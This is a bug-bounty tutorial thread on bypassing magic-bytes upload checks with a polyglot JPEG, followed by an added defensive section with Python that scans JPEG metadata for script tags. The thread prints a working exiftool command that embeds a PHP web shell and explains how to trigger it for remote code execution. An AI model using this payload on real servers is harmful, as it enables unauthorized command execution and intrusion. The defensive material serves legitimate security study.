When you know that a server is attempting to validate an image's intrinsic attributes and prevent Content-Type/Extension bypasses, you can upload a polyglot file to get RCE.
But what's all this? How do I do this?
Learn more below.
#bugbounty #bugbountytips #infosec
Understanding how applications can determine file type
There are many ways through which an application can determine the file type. This detection could be based on extension type, magic bytes detection or more sophisticated detection using file headers.
1. Extension type detection
The easiest of all ways to detect a file type is using the file's extension. Example: dogs.jpg is a JPG file.
I have already written a thread to perform extension bypasses and upload a web shell. Check it out here:
2. Magic bytes detection
Certain file types may always contain a specific sequence of bytes (aka Magic Bytes) in their header or footer.
For example, JPEG files begin with FF D8 and PDF files start with 25 50 44 46 (hex).
The Catch
Although magic bytes detection is a more advanced way of file type detection, it can still be bypassed.
We create a polyglot JPEG file containing malicious code within its metadata and upload it to get RCE.
How do I do it?
1. Download exiftool and a random image. Let's call it image.jpg
2. Create a polyglot file using the below command
exiftool -Comment="<?php echo system($_GET['command']); ?>" image.jpg -o polyglot.php
3. Upload polyglot.php to the server
Exploit
Once the file is uploaded, look in your proxy for the GET request that fetches it from the server. Requesting that URL with a 'command' parameter would ideally execute whatever command you supply in the payload.
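From the defender's side, the thread's point is that a magic-bytes check passes this file because the COM segment exiftool writes sits behind a valid FF D8 header. The following is an added example (not from the thread) that parses JPEG marker segments and rejects an upload whose metadata carries script tags; the minimal JPEG skeleton it builds is constructed sample data, not a real photo.

```python
import struct

SOI, EOI = b"\xff\xd8", b"\xff\xd9"
COM_MARKER, SOS_MARKER = 0xFE, 0xDA
# Tags that have no business inside image metadata served from a web root.
SUSPICIOUS_TAGS = (b"<?php", b"<?=", b"<script", b"<%")


def build_jpeg_with_comment(comment: bytes) -> bytes:
    """Constructed sample: bare JPEG skeleton (SOI, one COM segment, EOI).
    exiftool -Comment writes the same COM (FF FE) segment into a real photo."""
    segment = struct.pack(">H", len(comment) + 2) + comment  # length field counts itself
    return SOI + b"\xff" + bytes([COM_MARKER]) + segment + EOI


def has_jpeg_magic(data: bytes) -> bool:
    """The magic-bytes check from the thread: the file starts with FF D8."""
    return data[:2] == SOI


def iter_segments(data: bytes):
    """Yield (marker, payload) for every marker segment before the scan data."""
    pos = 2  # skip SOI
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:  # EOI: nothing more to parse
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:  # standalone markers, no length
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        if marker == SOS_MARKER:  # entropy-coded image data follows; stop here
            return
        pos += 2 + length


def metadata_contains_code(data: bytes) -> bool:
    """True if any metadata segment (COM, APPn, ...) carries a script tag."""
    return any(tag in payload for _, payload in iter_segments(data) for tag in SUSPICIOUS_TAGS)


def is_acceptable_upload(filename: str, data: bytes) -> bool:
    """Extension allow-list + magic bytes + metadata scan; all three must hold."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    return ext in ("jpg", "jpeg") and has_jpeg_magic(data) and not metadata_contains_code(data)
```

Scanning for tags is a detection aid, not a complete fix: re-encoding every upload server-side (which drops COM and APPn segments) and never serving user files under an executable extension close the hole regardless of what the metadata contains.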
Reference
To learn more about polyglots, I would definitely recommend checking out @vickieli7's blog post below.
Link: medium.com
That's a wrap!
If you enjoyed this thread:
1. Follow me @thebinarybot for more of these
2. RT the tweet below to share this thread with your audience